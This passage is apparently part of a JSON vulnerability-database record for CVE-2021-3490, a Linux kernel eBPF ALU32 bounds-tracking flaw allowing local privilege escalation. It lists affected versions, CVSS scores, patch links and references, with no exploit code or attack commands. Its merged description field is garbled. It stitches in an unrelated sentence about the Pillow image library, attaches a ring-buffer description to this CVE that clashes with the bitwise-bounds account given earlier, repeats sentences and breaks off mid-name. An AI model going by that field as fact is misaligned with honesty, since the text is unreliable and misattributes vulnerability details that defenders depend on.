      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "21.04"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-21-606"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-54395"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012328"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3490"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.37",
                "versionStartIncluding": "5.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.11.21",
                "versionStartIncluding": "5.11",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.12.4",
                "versionStartIncluding": "5.12",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.13:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.13:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.13:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.13:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:20.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:21.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-3490"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162548"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "PACKETSTORM",
        "id": "162550"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-723"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2021-3490",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2021-3490",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CNVD-2021-54395",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "security@ubuntu.com",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.1,
            "impactScore": 6.0,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2021-3490",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "ZDI",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.0,
            "id": "CVE-2021-3490",
            "impactScore": 6.0,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 0.7,
            "userInteraction": "NONE",
            "vectorString": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-3490",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "security@ubuntu.com",
            "id": "CVE-2021-3490",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "ZDI",
            "id": "CVE-2021-3490",
            "trust": 0.7,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2021-54395",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202105-723",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-21-606"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-54395"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012328"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3490"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3490"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-723"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The eBPF ALU32 bounds tracking for bitwise ops (AND, OR and XOR) in the Linux kernel did not properly update 32-bit bounds, which could be turned into out of bounds reads and writes in the Linux kernel and therefore, arbitrary code execution. This issue was fixed via commit 049c4e13714e (\"bpf: Fix alu32 const subreg bound tracking on bitwise operations\") (v5.13-rc4) and backported to the stable kernels in v5.12.4, v5.11.21, and v5.10.37. The AND/OR issues were introduced by commit 3f50f132d840 (\"bpf: Verifier, do explicit ALU32 bounds tracking\") (5.7-rc1) and the XOR variant was introduced by 2921c90d4718 (\"bpf:Fix a verifier failure with xor\") ( 5.10-rc1). Linux Kernel contains an out-of-bounds read vulnerability and an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows local attackers to escalate privileges on affected installations of Canonical Ubuntu. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the handling of eBPF programs. The issue results from the lack of proper validation of user-supplied eBPF programs prior to executing them. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the kernel. Linux kernel is the kernel used by Linux, the open source operating system of the Linux Foundation of the United States. \n\r\n\r\nThere are security vulnerabilities in the Linux kernel. The vulnerability stems from the discovery that eBPF ALU32 boundary tracking for bitwise operations (AND, OR, and XOR) does not update 32-bit boundaries. No detailed vulnerability details are currently provided. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. Please note that to address this issue,\nSF_BROADCAST support was removed temporarily from the CAN ISOTP\nimplementation in Ubuntu 21.04 kernels. \n\nSoftware Description:\n- linux-oem-5.10: Linux kernel for OEM systems\n\nDetails:\n\nRyota Shiga discovered that the eBPF implementation in the Linux kernel did\nnot properly verify that a BPF program only reserved as much memory for a\nring buffer as was allocated. A local attacker could use this to cause a\ndenial of service (system crash) or execute arbitrary code. A local attacker could\nuse this to cause a denial of service (system crash) or execute arbitrary\ncode. (CVE-2021-3490)\n\nBilly Jheng Bing-Jhong discovered that the io_uring implementation of the\nLinux kernel did not properly enforce the MAX_RW_COUNT limit in some\nsituations. A local attacker could use this to cause a denial of service\n(system crash) or execute arbitrary code. (CVE-2021-3491)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel contained a reference counting error. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2020-25670)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel did not properly deallocate memory in certain error\nsituations. A local attacker could use this to cause a denial of service\n(memory exhaustion). (CVE-2020-25671, CVE-2020-25672)\n\nIt was discovered that the Xen paravirtualization backend in the Linux\nkernel did not properly deallocate memory in some situations. A local\nattacker could use this to cause a denial of service (memory exhaustion). \n(CVE-2021-28688)\n\nIt was discovered that the io_uring subsystem in the Linux kernel contained\na race condition leading to a deadlock condition. A local attacker could\nuse this to cause a denial of service. (CVE-2021-28951)\n\nJohn Stultz discovered that the audio driver for Qualcomm SDM845 systems in\nthe Linux kernel did not properly validate port ID numbers. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2021-28952)\n\nZygo Blaxell discovered that the btrfs file system implementation in the\nLinux kernel contained a race condition during certain cloning operations. \nA local attacker could possibly use this to cause a denial of service\n(system crash). (CVE-2021-28964)\n\nVince Weaver discovered that the perf subsystem in the Linux kernel did\nnot properly handle certain PEBS records properly for some Intel Haswell\nprocessors. A local attacker could use this cause a denial of service\n(system crash). (CVE-2021-28971)\n\nIt was discovered that the RPA PCI Hotplug driver implementation in the\nLinux kernel did not properly handle device name writes via sysfs, leading\nto a buffer overflow. A privileged attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2021-28972)\n\nIt was discovered that the Freescale Gianfar Ethernet driver for the Linux\nkernel did not properly handle receive queue overrun when jumbo frames were\nenabled in some situations. An attacker could use this to cause a denial of\nservice (system crash). An attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2021-29266)\n\nIt was discovered that the TIPC protocol implementation in the Linux kernel\ndid not properly validate passed encryption key sizes. A local attacker\ncould use this to cause a denial of service (system crash). \n(CVE-2021-29646)\n\nIt was discovered that the Qualcomm IPC router implementation in the Linux\nkernel did not properly initialize memory passed to user space. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2021-29647)\n\nIt was discovered that the BPF user mode driver implementation in the Linux\nkernel did not properly deallocate memory in some situations. A local\nattacker could use this to cause a denial of service (memory exhaustion). \n(CVE-2021-29649)\n\nIt was discovered that a race condition existed in the netfilter subsystem\nof the Linux kernel when replacing tables. A local attacker could use this\nto cause a denial of service (system crash). (CVE-2021-29650)\n\nFelix Wilhelm discovered that the KVM implementation in the Linux kernel\nfor AMD processors contained race conditions on nested VMCB controls. A\nlocal attacker in a guest vm could possibly use this to gain elevated\nprivileges. (CVE-2021-29657)\n\nDan Carpenter discovered that the block device manager (dm) implementation\nin the Linux kernel contained a buffer overflow in the ioctl for listing\ndevices. A privileged local attacker could use this to cause a denial of\nservice (system crash). (CVE-2021-31916)\n\n\u9a6c\u54f2\u5b87 discovered that the IEEE 1394 (Firewire) nosy packet sniffer\ndriver in the Linux kernel did not properly perform reference counting in\nsome situations, leading to a use-after-free vulnerability. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2021-3483)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n  linux-image-5.10.0-1026-oem     5.10.0-1026.27\n  linux-image-oem-20.04b          5.10.0.1026.27\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://ubuntu.com/security/notices/USN-4948-1\n  CVE-2020-25670, CVE-2020-25671, CVE-2020-25672, CVE-2021-28688,\n  CVE-2021-28951, CVE-2021-28952, CVE-2021-28964, CVE-2021-28971,\n  CVE-2021-28972, CVE-2021-29264, CVE-2021-29266, CVE-2021-29646,\n  CVE-2021-29647, CVE-2021-29649, CVE-2021-29650, CVE-2021-29657,\n  CVE-2021-31916, CVE-2021-3483, CVE-2021-3489, CVE-2021-3490,\n  CVE-2021-3491\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1026.27\n. (CVE-2020-25639)\n\nOlivier Benjamin, Norbert Manthey, Martin Mazein, and Jan H",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-3490"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012328"
      },
      {
        "db": "ZDI",
        "id": "ZDI-21-606"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-54395"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3490"
      },
      {
        "db": "PACKETSTORM",
        "id": "162548"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "PACKETSTORM",
        "id": "162550"
      }
    ],
    "trust": 3.69
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-3490",
        "trust": 4.9
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/05/11/11",
        "trust": 2.4
      },
      {
        "db": "ZDI",
        "id": "ZDI-21-606",
        "trust": 2.3
      },
      {
        "db": "PACKETSTORM",
        "id": "164015",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012328",
        "trust": 0.8
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-13590",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "162548",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-54395",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021041363",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2136",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1622",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2291",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2812",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021081901",
        "trust": 0.6
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2021090010",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-723",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3490",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162549",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162550",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-21-606"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-54395"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3490"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012328"
      },
      {
        "db": "PACKETSTORM",
        "id": "162548"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "PACKETSTORM",
        "id": "162550"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3490"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-723"
      }
    ]
  },
  "id": "VAR-202106-1232",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-54395"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-54395"
      }
    ]
  },
  "last_update_date": "2023-12-18T10:53:25.225000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Fix\u00a0alu32\u00a0const\u00a0subreg\u00a0bound\u00a0tracking\u00a0on\u00a0bitwise\u00a0operations",
        "trust": 0.8,
        "url": "https://ubuntu.com/security/notices/usn-4949-1"
      },
      {
        "title": "Canonical has issued an update to correct this vulnerability.",
        "trust": 0.7,
        "url": "https://www.openwall.com/lists/oss-security/2021/05/11/11"
      },
      {
        "title": "Patch for Linux kernel buffer overflow vulnerability (CNVD-2021-54395)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/280546"
      },
      {
        "title": "Linux kernel Buffer error vulnerability fix",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=154141"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2021-3490 log"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-21-606"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-54395"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3490"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012328"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-723"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-125",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-787",
        "trust": 1.0
      },
      {
        "problemtype": "Out-of-bounds read (CWE-125) [NVD evaluation ]",
        "trust": 0.8
      },
      {
        "problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012328"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3490"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.1,
        "url": "https://www.openwall.com/lists/oss-security/2021/05/11/11"
      },
      {
        "trust": 2.2,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=049c4e13714ecbca567b4d5f6d563f05d431c80e"
      },
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/164015/linux-ebpf-alu32-32-bit-invalid-bounds-tracking-local-privilege-escalation.html"
      },
      {
        "trust": 2.2,
        "url": "https://www.zerodayinitiative.com/advisories/zdi-21-606/"
      },
      {
        "trust": 1.7,
        "url": "https://ubuntu.com/security/notices/usn-4950-1"
      },
      {
        "trust": 1.7,
        "url": "https://ubuntu.com/security/notices/usn-4949-1"
      },
      {
        "trust": 1.6,
        "url": "https://security.netapp.com/advisory/ntap-20210716-0004/"
      },
      {
        "trust": 1.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3490"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-integer-overflow-via-ebpf-35395"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021081901"
      },
      {
        "trust": 0.6,
        "url": "https://device.harmonyos.com/cn/docs/security/update/security-bulletins-wearables-202111-0000001172568432"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2136"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2812"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162548/ubuntu-security-notice-usn-4950-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1622"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/issue/wlb-2021090010"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3490"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2291"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3491"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3489"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29650"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29266"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29264"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29646"
      },
      {
        "trust": 0.1,
        "url": "http://seclists.org/oss-sec/2021/q2/125"
      },
      {
        "trust": 0.1,
        "url": "https://security.archlinux.org/cve-2021-3490"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.11.0-1007.7"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.11.0-1006.6"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1007.7"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.11.0-1008.8"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.11.0-1005.5"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.11.0-17.18"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.11.0-1007.7"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/bugs/1927409"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25670"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4948-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28971"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1026.27"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29657"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28952"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28688"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29649"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3483"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28951"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29647"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31916"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28964"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28972"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1029.30"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1024.27"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-26930"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1027.29"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28375"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-53.60~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-53.60"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-26931"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1031.32"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25639"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29265"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1032.34"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1033.35"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-21-606"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-54395"
      },
      {
        "db": "VULMON",
